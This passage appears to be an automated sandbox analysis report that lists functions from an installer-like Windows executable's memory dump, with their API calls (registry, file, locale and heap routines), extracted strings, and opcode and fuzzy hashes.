Uniqueness Score: -1.00%

Function 013CE28D, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 013C949A: EnterCriticalSection.KERNEL32(-0147BC60,?,013CB7D8,01298876,01471778,0000000C,013CBAB9,?), ref: 013C94A9

EnumSystemLocalesW.KERNEL32(013CE280,00000001,01471898,0000000C,013CE6AB,00000000), ref: 013CE2C5

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: bf650a1ae468e30f70a82e467077943fd434f8b35796f217d72656f95592941e
Instruction ID: 97dd81cc10de4f0a1fb4439cae7c6b7d2550067c5bb1ea7407c2081c0a221fe5
Opcode Fuzzy Hash: bf650a1ae468e30f70a82e467077943fd434f8b35796f217d72656f95592941e
Instruction Fuzzy Hash: 26F06D72A40306EFE720EF9CE481B9D7BF1EB49B28F10402EE411DB2A0D7B559008F80

Uniqueness

Uniqueness Score: -1.00%

Function 013D238E, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 013CC266: GetLastError.KERNEL32(?,?,?,013C13D2,?,?,00000000,?,013C0915,?,?,?), ref: 013CC26B
Part of subcall function 013CC266: SetLastError.KERNEL32(00000000,00000002,000000FF,?,013C0915,?,?,?), ref: 013CC309

EnumSystemLocalesW.KERNEL32(013D22E7,00000001,?,?,?,013D2B4F,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 013D23C5

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ae7e3922de84d56293c7d4ad88bf7d4569f76fa0310f1d181efe4eca19b4100e
Instruction ID: 6f336750c5d7a3271954ba7651b6130387e77ed7fa3ce34eb6a66e2791060b69
Opcode Fuzzy Hash: ae7e3922de84d56293c7d4ad88bf7d4569f76fa0310f1d181efe4eca19b4100e
Instruction Fuzzy Hash: 68F0E53730020557CB199F79E845AAB7F94EFC5A28F06405CEA098B651DA71D942C790

Uniqueness

Uniqueness Score: -1.00%

Function 013CE806, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,013C8B63,?,20001004,00000000,00000002,?,?,013C8170), ref: 013CE83A

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7b0bb3c94f2cf170065551a89aa0f19f1f4c5a45527f78318542c81109989abe
Instruction ID: 8fcf95da0f892c8d4cdd3dbff80f049b10b19b0223ee86b3a675c783bf30bdfc
Opcode Fuzzy Hash: 7b0bb3c94f2cf170065551a89aa0f19f1f4c5a45527f78318542c81109989abe
Instruction Fuzzy Hash: 63E01A32500218BBCB122F65DC04ADE7E29EB45B64F044424F90566125CB35AD20AB95

Uniqueness

Uniqueness Score: -1.00%

Function 012C7CF0, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

Ph/, xrefs: 012C7D0F, 012C7DC6

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Ph/
API String ID: 0-906322640
Opcode ID: c69772d092febd8ca8d6000bc94607530775ea86d098230f2142b2d93a7cbd49
Instruction ID: ef68caac27c3323bea6e52484260e6671eda0164329e2ea665eccae17e25277a
Opcode Fuzzy Hash: c69772d092febd8ca8d6000bc94607530775ea86d098230f2142b2d93a7cbd49
Instruction Fuzzy Hash: AD31897290060AEFDB10DF69C984B9AFBB4FF05734F108369E624A76D0D731A910CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012A6AC0, Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 96e28a12a7a23b1293a5ff073872533de77beff7a22e41dea49ffc5213907e0e
Instruction ID: 1f0bb913e2bc6c922cd65cbec262bba9bc9454f71c352fc2d7a41e77400cba79
Opcode Fuzzy Hash: 96e28a12a7a23b1293a5ff073872533de77beff7a22e41dea49ffc5213907e0e
Instruction Fuzzy Hash: 0212BB71A146069FDB21CF68C844BAEBBF5FF88304F48491DF686A7660E731E845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013038F0, Relevance: .5, Instructions: 513COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a3e7fb074098ea9988b744ecb2fe9e930e12ac3787faca88c2cfc875c6c74ba
Instruction ID: 67359f57fb1e277cecf58d41bc6efa5d6cf8ce986fda547ed8b7b2b3f82b3906
Opcode Fuzzy Hash: 9a3e7fb074098ea9988b744ecb2fe9e930e12ac3787faca88c2cfc875c6c74ba
Instruction Fuzzy Hash: 6402E072E002169FDB19DF6CC890AAEBBE5FB59314F14422EE915E7394E730AD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012BF560, Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 236b63cf79cdef4b1f611d521f835caa545d08a48500083709f30b4289a3759f
Instruction ID: 287b0722a1d4275df5100ecd773c35895b0a35664ded10518484b960747fc460
Opcode Fuzzy Hash: 236b63cf79cdef4b1f611d521f835caa545d08a48500083709f30b4289a3759f
Instruction Fuzzy Hash: CAB19172E101169FCB18DF6CCD81AEDBBF5EB98340B54812AE905EB395DB30AD01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013C2241, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45875d150c2617d2473f490dc1a2a32b7e8889a1875b2151300f13e929cbe86
Instruction ID: d404c980f9015db515c8639acbd2f512dcd6c8fe53a481e05e9300d5fedba2e2
Opcode Fuzzy Hash: d45875d150c2617d2473f490dc1a2a32b7e8889a1875b2151300f13e929cbe86
Instruction Fuzzy Hash: 86615B7070070A97EB38EE6D88947BFB7AAEF55E0CF04091DE942EB6C0DB619D458351

Uniqueness

Uniqueness Score: -1.00%

Function 0129D890, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c10139005507f9f03e984fcf1e295fe175718fe7afe95efeca2c882de7a66b8
Instruction ID: d3372238b2b7b49dc62aefc276823bd3d5bd02ae2d176a1a21a3837a2cf7d5ec
Opcode Fuzzy Hash: 0c10139005507f9f03e984fcf1e295fe175718fe7afe95efeca2c882de7a66b8
Instruction Fuzzy Hash: DD71D7B0805B88DFE761CF64C55478ABFF0BF09314F108A5EC4A9AB391D3B96648CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013D8F4E, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c9089bf36d3c8017a6fbf1a7b7c938fec86b96f2d23ad2692d25bae316f77de
Instruction ID: 9fa4b081c88e90c9c59064413193ba7a791d58cdab4153e7daae1e32f8d7d1ae
Opcode Fuzzy Hash: 2c9089bf36d3c8017a6fbf1a7b7c938fec86b96f2d23ad2692d25bae316f77de
Instruction Fuzzy Hash: B621B373F204394B7B0CC47E8C522BDB6E1C78C501745823AE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 012A6760, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e74f58cab3682e0dead413feba874d19976f75495a5f8063f34a191a649d3e1b
Instruction ID: 9a7664cab6d36d1d78de33e6debcd08591057abb7c7c6a6c244109825077c14e
Opcode Fuzzy Hash: e74f58cab3682e0dead413feba874d19976f75495a5f8063f34a191a649d3e1b
Instruction Fuzzy Hash: 124182B0600656EFEB14CF69C908B55FFB4FF04724F148269E62497A90E776E914CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013D8E2E, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23f4c9d11acd666fe27e9079a99d5a1680453289e5f65bd0b89a9d543403e4d6
Instruction ID: f185abebbf176aa7d1373dfbe02fcc1b56598380e23558f9777e52d3bc3942b5
Opcode Fuzzy Hash: 23f4c9d11acd666fe27e9079a99d5a1680453289e5f65bd0b89a9d543403e4d6
Instruction Fuzzy Hash: 6E11C663F30C295B675C817D8C132BAA2D6EBD814034F433BD826E7284E9A4EE13C290

Uniqueness

Uniqueness Score: -1.00%

Function 012A0320, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766b1a3c28e615c53c61bdf607197ee90803c82093848948cb3167198b564890
Instruction ID: eab81463c69623fed4d4c01df9d89f509bce27c49bc5b5c0b275e1dcff918ebd
Opcode Fuzzy Hash: 766b1a3c28e615c53c61bdf607197ee90803c82093848948cb3167198b564890
Instruction Fuzzy Hash: F0215BB1804788CFD720CF68C54478ABBF4FF19314F11869ED4559B7A1D3B5AA48CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0129FD60, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94d7cdffe4288f0f2e1d7f4b26e3cdd2c2162c750fa27ad81506a45cf4b2ed0c
Instruction ID: 7371e446a7477c9acf46cbad125c58a902a403f0b44eac3efa198bdc453538d0
Opcode Fuzzy Hash: 94d7cdffe4288f0f2e1d7f4b26e3cdd2c2162c750fa27ad81506a45cf4b2ed0c
Instruction Fuzzy Hash: A7215BB1804788CFD710CF68C544B8ABBF4FF19314F11869ED4559B7A1D3B5AA48CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0129F740, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4c7229c3d04eb608974c36e14dced5c5bab279b92f3b2fb06f14bc66c25bb86
Instruction ID: 5610b61c8d8b857266b58e99372978a1ef5778c661e240e225089b437b59d25f
Opcode Fuzzy Hash: a4c7229c3d04eb608974c36e14dced5c5bab279b92f3b2fb06f14bc66c25bb86
Instruction Fuzzy Hash: 2BF01D70004B519BEB715B2CED44B96BFE1BF09625F008A18E9BAD29F4DB30A444DB10

Uniqueness

Uniqueness Score: -1.00%

Function 013D5DCA, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 951d4ede6683310154bd11649067ea40b8c7609eabe5c85a2c5b8494bdbcc353
Instruction ID: 4b9a4858271b60c665ff2f0aa1ff2fbb8bf47838c8ecfb2aab58e6a98a668339
Opcode Fuzzy Hash: 951d4ede6683310154bd11649067ea40b8c7609eabe5c85a2c5b8494bdbcc353
Instruction Fuzzy Hash: 72E08C72911268EBCB14DB9CD94898AFBFCEB45A44B1104AAF601D3200D270DE01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 01352FD0, Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 425registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\JavaSoft\Java Development Kit\,00000000,?,?,2F685009,?,?), ref: 01353033
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?), ref: 013531C9
RegQueryValueExW.ADVAPI32(?,JavaHome,00000000,00000000,00000000,?,?,?,?), ref: 01353225
RegQueryValueExW.ADVAPI32(?,JavaHome,00000000,00000000,00000000,?,?), ref: 01353275
RegCloseKey.ADVAPI32(?), ref: 013532B5

Strings

JavaHome, xrefs: 0135321F, 0135326A
Software\JavaSoft\Java Runtime Environment\, xrefs: 01353016
Software\JavaSoft\Java Development Kit\, xrefs: 01353025, 0135302D

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenQueryValue$Close
String ID: JavaHome$Software\JavaSoft\Java Development Kit\$Software\JavaSoft\Java Runtime Environment\
API String ID: 2529929805-1079072530
Opcode ID: c6887dc3975ca1f981974759418f2e27edba546350e6e35d02277540938fc707
Instruction ID: fec9faf88863f0fcf9ef5f04bd8f84d7b154bb28add93f43cab22f67eae47a20
Opcode Fuzzy Hash: c6887dc3975ca1f981974759418f2e27edba546350e6e35d02277540938fc707
Instruction Fuzzy Hash: B7029D70D012599BDB60DF28CC88B9EBBB4BF54748F2442D9D809A7280EB75AF84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 013D0F6D, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 013D0FB1

Part of subcall function 013D0073: _free.LIBCMT ref: 013D0090
Part of subcall function 013D0073: _free.LIBCMT ref: 013D00A2
Part of subcall function 013D0073: _free.LIBCMT ref: 013D00B4
Part of subcall function 013D0073: _free.LIBCMT ref: 013D00C6
Part of subcall function 013D0073: _free.LIBCMT ref: 013D00D8
Part of subcall function 013D0073: _free.LIBCMT ref: 013D00EA
Part of subcall function 013D0073: _free.LIBCMT ref: 013D00FC
Part of subcall function 013D0073: _free.LIBCMT ref: 013D010E
Part of subcall function 013D0073: _free.LIBCMT ref: 013D0120
Part of subcall function 013D0073: _free.LIBCMT ref: 013D0132
Part of subcall function 013D0073: _free.LIBCMT ref: 013D0144
Part of subcall function 013D0073: _free.LIBCMT ref: 013D0156
Part of subcall function 013D0073: _free.LIBCMT ref: 013D0168

_free.LIBCMT ref: 013D0FA6

Part of subcall function 013CC4B8: RtlFreeHeap.NTDLL(00000000,00000000,?,013CD752,?,00000004,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC4CE
Part of subcall function 013CC4B8: GetLastError.KERNEL32(?,?,013CD752,?,00000004,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC4E0

_free.LIBCMT ref: 013D0FC8
_free.LIBCMT ref: 013D0FDD
_free.LIBCMT ref: 013D0FE8
_free.LIBCMT ref: 013D100A
_free.LIBCMT ref: 013D101D
_free.LIBCMT ref: 013D102B
_free.LIBCMT ref: 013D1036
_free.LIBCMT ref: 013D106E
_free.LIBCMT ref: 013D1075
_free.LIBCMT ref: 013D1092
_free.LIBCMT ref: 013D10AA

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: a8509e66800ac1fb14b08dd1ba8271f0450658e0dd545db956fe7773e35348e3
Instruction ID: f53902751d0c06d6740bda272ab93980b8d7497524dff1a9259bb266bb949c7d
Opcode Fuzzy Hash: a8509e66800ac1fb14b08dd1ba8271f0450658e0dd545db956fe7773e35348e3
Instruction Fuzzy Hash: 74319133600B069FEB26BA3DE844B6AB7E9EF10618F60841EE559E7150DF34E844C720

Uniqueness

Uniqueness Score: -1.00%

Function 0135C4C0, Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 290libraryloaderCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,2F685009,?,?,0147C630), ref: 0135C508
LoadLibraryW.KERNEL32(Shell32.dll,?,0147C630), ref: 0135C517
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0135C52B
SHGetPathFromIDListW.SHELL32(?,00000000), ref: 0135C5AA
SHGetMalloc.SHELL32(?), ref: 0135C5E7
PathFileExistsW.SHLWAPI(?,ADVINST_LOGS,0000000C,?,00000000), ref: 0135C63A
CreateDirectoryW.KERNEL32(?,?,Everyone,?,00000000,?,00000000), ref: 0135C6C1

Strings

SHGetSpecialFolderPathW, xrefs: 0135C525
Shell32.dll, xrefs: 0135C512
Everyone, xrefs: 0135C67A
ADVINST_LOGS, xrefs: 0135C62D

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$AddressCreateDirectoryExistsFileFolderFromLibraryListLoadLocationMallocProcSpecial
String ID: ADVINST_LOGS$Everyone$SHGetSpecialFolderPathW$Shell32.dll
API String ID: 1254244429-1733115844
Opcode ID: 27ed5cffa2af2e0ce9c9707f120b20229df512c4c161a5df473ec07578679835
Instruction ID: 22f8feac88012b3a3bd6a2851d7cd084e0bf72dcbcd630fdbed1af0d531a9c7d
Opcode Fuzzy Hash: 27ed5cffa2af2e0ce9c9707f120b20229df512c4c161a5df473ec07578679835
Instruction Fuzzy Hash: ADB18E71D00309DFEB50DFA9C948BAEBBF8EF54718F248119D915AB290EB755A40CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0132DFB0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 223threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(0147C5F8,2F685009,?,?,00000000,?,?,?,?,?,00000000,013F87B7,000000FF), ref: 0132E023
EnterCriticalSection.KERNEL32(?,2F685009,?,?,00000000,?,?,?,?,?,00000000,013F87B7,000000FF), ref: 0132E035
GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,00000000,013F87B7,000000FF), ref: 0132E042
GetCurrentThread.KERNEL32 ref: 0132E04D
GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,00000000,?,01420988,00000000,?,?,?,?,?,00000000,013F87B7,000000FF), ref: 0132E22E
LeaveCriticalSection.KERNEL32(?,01420988,00000000,?,?,?,?,?,00000000,013F87B7,000000FF), ref: 0132E30A

Strings

MODULE_BASE_ADDRESS, xrefs: 0132E27B
*** Stack Trace (x86) ***, xrefs: 0132E127
<--------------------MORE--FRAMES-------------------->, xrefs: 0132E1D2
[0x%.8Ix] , xrefs: 0132E235

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Current$EnterHandleInitializeLeaveModuleProcessThread
String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$MODULE_BASE_ADDRESS$[0x%.8Ix]
API String ID: 3051236879-315745733
Opcode ID: 9e35245d6a9cf7735275cd8580049642af300a88d7f83d3c8ebd4e7052767515
Instruction ID: e9dfe5345ee524d97a93fb81c167ca00f99fadb0eeb6970885e3c6eacacb8fe8
Opcode Fuzzy Hash: 9e35245d6a9cf7735275cd8580049642af300a88d7f83d3c8ebd4e7052767515
Instruction Fuzzy Hash: 16A15A719002899FDF25DFA8CC55BEE7BB8FF15308F504069EA09AB290DBB55708CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0135B7D0, Relevance: 16.7, APIs: 11, Instructions: 192fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(0147C630,2F685009,?,00000010), ref: 0135B80C

Part of subcall function 01297CC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000001,?,012A4AC0,-00000010,?,012A888D,*.*), ref: 01297CE7

EnterCriticalSection.KERNEL32(00000010,2F685009,?,00000010), ref: 0135B819
WriteFile.KERNEL32(00000000,?,?,000000FF,00000000), ref: 0135B84B
FlushFileBuffers.KERNEL32(00000000,?,?,000000FF,00000000), ref: 0135B854
WriteFile.KERNEL32(00000000,01348357,C630B9EC,01401E2D,00000000,0142E484,00000001,?,?,000000FF,00000000), ref: 0135B8D6
FlushFileBuffers.KERNEL32(00000000,?,?,000000FF,00000000), ref: 0135B8DF
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0135B915
FlushFileBuffers.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0135B91E
WriteFile.KERNEL32(00000000,?,?,?,00000000,01422990,00000002,?,?,?,00000000,?,?,000000FF,00000000), ref: 0135B97F
FlushFileBuffers.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0135B988
LeaveCriticalSection.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0135B9B8

Part of subcall function 01298440: HeapAlloc.KERNEL32(?,00000000,?,2F685009,00000000,013DBBA0,000000FF,?,?,01471B74,?,0135FF88,80004005,2F685009), ref: 0129848A

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersFlushWrite$CriticalSection$AllocEnterFindHeapInitializeLeaveResource
String ID:
API String ID: 3436934177-0
Opcode ID: 6b37f6310e0ac1a878bdfaf0201549c84e959bde507ab21d9787531d293d294a
Instruction ID: 2207c665ebc32b86598672ea94d73450b84da3d5dbd0200df1d31599544e5a9a
Opcode Fuzzy Hash: 6b37f6310e0ac1a878bdfaf0201549c84e959bde507ab21d9787531d293d294a
Instruction Fuzzy Hash: C361CB30A00649AFDB11DFA8CD48FAEFBB5FF46314F148169E911EB2A5D7709914CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01367060, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 342libraryloaderCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(000000FF,2F685009,00000000,?,73B74D40,?,00000000,01404418,000000FF), ref: 013670C3
LocalFree.KERNEL32(?,2F685009,00000000,?,73B74D40,?,00000000,01404418,000000FF), ref: 0136712E
